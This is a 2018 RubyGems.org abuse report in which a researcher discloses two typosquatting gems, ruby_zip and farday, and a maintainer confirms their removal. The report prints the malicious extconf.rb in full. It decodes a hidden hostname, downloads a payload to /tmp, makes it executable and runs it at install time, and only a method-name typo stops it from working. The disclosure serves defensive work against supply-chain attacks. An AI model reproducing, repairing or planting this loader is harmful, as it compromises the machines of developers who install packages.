Abuse report farday and ruby_zip (RubyGems.org discussion, 2018-09-18)
<div><p>Hi,</p>
<p>I'm assuming the reader is familiar with <a href="https://incolumitas.com/2016/06/08/typosquatting-package-managers/#typosquatting-package-managers">Typosquatting</a>, and the previous discussions on this topic (e.g. <a href="https://github.com/rubygems/rubygems.org/issues/1334">bunlder</a>).</p>
<p>I'd like to report 1. ruby_zip and 2. farday, which are typosquatting other popular ruby gems. Fortunately, there seems to be a typo in the exploit found in these gems' extconf.rb, as I found out when trying to install one of them. See [1] and [2].</p>
<p>Now, there is something that feels very automated to me about these packages: the gems' files and variable names seem generated, and the gemspecs themselves feel very much generated as well. I wonder if there are other gems like these out there, with working code, and if there is anything else RubyGems can do to prevent these.</p>
<p>Thanks<br>
zelivans</p>
<p>[1] ruby_zip installation:</p>
<pre>
<code>/ # gem install ruby_zip
Building native extensions. This could take a while...
Successfully installed nokogiri-1.8.4
Fetching: ruby_zip-0.1.3.gem (100%)
Building native extensions. This could take a while...
ERROR: Error installing ruby_zip:
ERROR: Failed to build gem native extension.

current directory: /usr/lib/ruby/gems/2.4.0/gems/ruby_zip-0.1.3/ext/laterite/laryngopharyngeal/amaterialistic
/usr/bin/ruby -r ./siteconf20180918-59-1sc0gxv.rb extconf.rb
extconf.rb:27:in `run': undefined method `setup_exploit' for Calvinize:Class (NoMethodError)
        from extconf.rb:31:in `&lt;main&gt;'

extconf failed, exit code 1

Gem files will remain installed in /usr/lib/ruby/gems/2.4.0/gems/ruby_zip-0.1.3 for inspection.
Results logged to /usr/lib/ruby/gems/2.4.0/extensions/x86_64-linux/2.4.0/ruby_zip-0.1.3/gem_make.out</code>
</pre>
<p>[2] extconf.rb file of ruby_zip gem:</p>
<pre>
<code>require 'net/http'
require 'uri'
require 'base64'
require 'resolv'

# This is the malicious extconf.rb as shipped in the gem (comments added for
# the reader). Note the method is defined as setup_explot but called as
# setup_exploit: that typo is why the install fails with NoMethodError.
class Calvinize
  def self.setup_explot(dematerialising)
    if !dematerialising.nil? and dematerialising != '0.0.0.0'
      # Fetch a payload from the resolved host, drop it in /tmp, make it
      # executable and run it.
      dodgery = Net::HTTP.get_response(URI('http://' + dematerialising + '/contributor'))
      File.open('/tmp/endopod', 'wb+') do |upsurge|
        upsurge.binmode
        upsurge.write(dodgery.body)
        upsurge.chmod(0777)
        upsurge.close
      end
      system('/tmp/endopod')
    end
  end

  def self.run()
    # The hostname is hidden as a Base64 literal and resolved at install time.
    struthioniform = 'NDJiNTU5YjEuaGt6enp6ei5kZQ=='
    futurize = nil
    begin
      futurize = Resolv.getaddress(Base64.decode64(struthioniform))
    rescue
    end
    self.setup_exploit(futurize)
  end
end

Calvinize.run()</code>
</pre>
</pre></div>
Ariel Zelivansky, 2018-09-18T21:11:36Z
<div><p>Thanks for the report! We've removed those gems, and we're working on a system to eliminate (or at least hopefully reduce) this kind of thing in the future.</p></div>
indirect, 2018-09-18T21:29:33Z